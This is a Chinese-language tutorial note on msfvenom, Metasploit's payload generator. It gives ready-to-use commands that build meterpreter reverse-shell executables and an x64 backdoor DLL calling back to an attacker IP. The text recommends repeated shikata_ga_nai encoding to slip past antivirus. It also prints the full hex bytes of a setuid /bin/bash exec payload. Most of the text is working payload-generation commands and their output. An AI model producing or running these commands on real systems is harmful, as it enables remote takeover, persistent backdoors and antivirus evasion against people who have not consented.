msfvenom的使用

参考：
http://www.zerokeeper.com/tools/use-of-msfvenom.html
https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom

Msfvenom 是净荷生成和编码的组合。 它将取代 msfpayload 和 msfencode 于 2015 年 6 月 8 日。

产生一个payload

要用msfvenom产生一个payload必须要指定-p, --payload和-f --format两个参数。
查找有哪些有些payloads

➜  ~ msfvenom -l payloads Framework Payloads (473 total)==============================    Name                                                Description    ----                                                -----------    aix/ppc/shell_bind_tcp                              Listen for a connection and spawn a command shell    aix/ppc/shell_find_port                             Spawn a shell on an established connection    aix/ppc/shell_interact                              Simply execve /bin/sh (for inetd programs)    aix/ppc/shell_reverse_tcp                           Connect back to attacker and spawn a command shell    android/meterpreter/reverse_http                    Run a meterpreter server in Android. Tunnel communication over HTTP    android/meterpreter/reverse_https                   Run a meterpreter server in Android. Tunnel communication over HTTPS    android/meterpreter/reverse_tcp                     Run a meterpreter server in Android. Connect back stager...➜  ~ msfvenom -l payloads|wc -l                                                                                                   [0:14:45]480

举个栗子

msfvenom -p windows/meterpreter/bind_tcp -f exe

一般情况下会这么用

msfvenom -p windows/meterpreter/reverse_tcp lhost=[Attacker’s IP] lport=4444 -f exe -o /tmp/my_payload.exe

我的history中有这么用的

➜  ~  msfvenom -p linux/x86/exec CMD=/bin/bash PrependSetuid=True -f elf |xxd -i                                                  [0:26:50]No platform was selected, choosing Msf::Module::Platform::Linux from the payloadNo Arch selected, selecting Arch: x86 from the payloadNo encoder or badchars specified, outputting raw payloadPayload size: 52 bytesFinal size of elf file: 136 bytes  0x7f, 0x45, 0x4c, 0x46, 0x01, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,  0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x03, 0x00, 0x01, 0x00, 0x00, 0x00,  0x54, 0x80, 0x04, 0x08, 0x34, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,  0x00, 0x00, 0x00, 0x00, 0x34, 0x00, 0x20, 0x00, 0x01, 0x00, 0x00, 0x00,  0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,  0x00, 0x80, 0x04, 0x08, 0x00, 0x80, 0x04, 0x08, 0x88, 0x00, 0x00, 0x00,  0xbc, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00,  0x31, 0xdb, 0x6a, 0x17, 0x58, 0xcd, 0x80, 0x6a, 0x0b, 0x58, 0x99, 0x52,  0x66, 0x68, 0x2d, 0x63, 0x89, 0xe7, 0x68, 0x2f, 0x73, 0x68, 0x00, 0x68,  0x2f, 0x62, 0x69, 0x6e, 0x89, 0xe3, 0x52, 0xe8, 0x0a, 0x00, 0x00, 0x00,  0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x62, 0x61, 0x73, 0x68, 0x00, 0x57, 0x53,  0x89, 0xe1, 0xcd, 0x80➜  ~ man xxd # -i | -include # output  in  C  include  file style.# -p | plain# plain hexdump style.                                                                                                                     [0:32:11]➜  ~ msfvenom -p linux/x86/exec CMD=/bin/bash PrependSetuid=True -f elf |xxd -p                                                   [0:32:41]No platform was selected, choosing Msf::Module::Platform::Linux from the payloadNo Arch selected, selecting Arch: x86 from the payloadNo encoder or badchars specified, outputting raw payloadPayload size: 52 bytesFinal size of elf file: 136 bytes7f454c460101010000000000000000000200030001000000548004083400000000000000000000003400200001000000000000000100000000000000008004080080040888000000bc000000070000000010000031db6a1758cd806a0b58995266682d6389e7682f736800682f62696e89e352e80a0000002f62696e2f6261736800575389e1cd80

再比如ms17-010的x64架构的dll后门生成。您也可以使用 - i 标志进行编码的有效载荷多次。 有时更多的迭代可以帮助避免杀毒软件

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.170.135 LPORT=4444 -i 3 -e x86/shikata_ga_nai -f dll > backdoor_x64.dll

The -b flag is meant to be used to avoid certain characters in the payload. When this option is used, msfvenom will automatically find a suitable encoder to encode the payload:

msfvenom -p windows/meterpreter/bind_tcp -b '\x00' -f raw